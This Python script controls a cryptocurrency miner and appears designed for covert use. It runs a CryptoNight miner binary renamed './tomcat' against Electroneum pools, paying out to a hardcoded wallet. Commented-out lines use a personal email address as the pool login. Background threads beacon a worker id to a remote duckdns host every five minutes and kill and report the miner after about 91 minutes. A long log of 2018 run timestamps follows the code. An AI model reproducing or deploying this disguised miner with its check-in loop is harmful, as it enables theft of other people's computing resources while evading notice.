import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:09:06.028985
#2018-02-17 16:57:05.601821
#2018-02-17 18:47:02.136386
#2018-02-17 20:34:06.709475
#2018-02-17 22:20:01.546732
#2018-02-18 00:04:02.070176
#2018-02-18 01:55:06.678107
#2018-02-18 03:43:05.810008
#2018-02-18 05:31:05.398022
#2018-02-18 07:23:01.309263
#2018-02-18 09:11:01.883422
#2018-02-18 10:57:01.708361
#2018-02-18 12:43:05.956661
#2018-02-18 14:30:01.728682
#2018-02-18 16:20:08.967490
#2018-02-18 18:09:06.977047
#2018-02-18 19:55:04.547232
#2018-02-18 21:41:06.128869
#2018-02-18 23:29:06.314906
#2018-02-19 01:16:06.086808
#2018-02-19 03:03:05.187489
#2018-02-19 04:48:03.765156
#2018-02-19 06:33:06.391841
#2018-02-19 08:22:06.691858
#2018-02-19 10:11:08.548656
#2018-02-19 11:59:04.956909
#2018-02-19 13:46:01.756124
#2018-02-19 15:35:10.278390
#2018-02-19 17:23:07.977085
#2018-02-19 19:11:04.749203
#2018-02-19 20:58:05.376220
#2018-02-19 22:45:04.502124
#2018-02-20 00:29:05.853352
#2018-02-20 02:18:05.805360
#2018-02-20 04:11:01.797747
#2018-02-20 05:53:06.874085
#2018-02-20 07:40:07.879214
#2018-02-20 09:24:05.047172
#2018-02-20 11:08:01.634412
#2018-02-20 12:56:08.624920
#2018-02-20 14:42:08.198239
#2018-02-20 16:32:09.158639
#2018-02-20 18:19:08.758370
#2018-02-20 20:10:10.944255
#2018-02-20 21:57:05.107923
#2018-02-20 23:39:07.259304
#2018-02-21 01:23:07.995296
#2018-02-21 03:12:08.063721
#2018-02-21 05:01:08.366288
#2018-02-21 06:49:01.488841
#2018-02-21 08:34:04.513556
#2018-02-21 10:20:09.408942
#2018-02-21 12:09:06.697995
#2018-02-21 13:57:09.917627
#2018-02-21 15:42:08.545212
#2018-02-21 17:36:01.808619
#2018-02-21 19:24:06.002759
#2018-02-21 21:12:07.271773
#2018-02-21 23:00:10.975622
#2018-02-22 00:49:07.553633
#2018-02-22 02:37:05.479829
#2018-02-22 04:22:06.386082
#2018-02-22 06:08:06.727698
#2018-02-22 07:53:05.716885
#2018-02-22 09:42:06.278997
#2018-02-22 11:28:09.106680
#2018-02-22 13:17:08.969710
#2018-02-22 15:06:08.428522
#2018-02-22 16:50:08.248346
#2018-02-22 18:40:03.986945
#2018-02-22 20:31:11.300294
#2018-02-22 22:17:05.658299
#2018-02-23 00:03:07.597867
#2018-02-23 01:51:06.430401
#2018-02-23 03:40:03.815988
#2018-02-23 05:24:06.708594
#2018-02-23 07:10:09.030758
#2018-02-23 09:14:05.747775
#2018-02-23 11:21:01.263359
#2018-02-23 13:11:01.183034
#2018-02-23 14:57:09.369911
#2018-02-23 16:45:11.906697
#2018-02-23 18:32:07.702885
#2018-02-23 20:21:08.320023
#2018-02-23 22:08:07.373468
#2018-02-23 23:57:01.547080
#2018-02-24 01:46:04.984370
#2018-02-24 03:41:06.691321
#2018-02-24 05:26:06.845114
#2018-02-24 07:13:04.495455
#2018-02-24 09:03:07.365547
#2018-02-24 11:03:01.682477
#2018-02-24 12:51:04.626750
#2018-02-24 14:39:04.378635
#2018-02-24 16:28:07.247164
#2018-02-24 18:20:08.833187
#2018-02-24 20:06:05.644464
#2018-02-24 21:49:04.507487
#2018-02-25 00:50:03.541582
#2018-02-25 04:44:02.058133
#2018-02-25 08:50:03.703196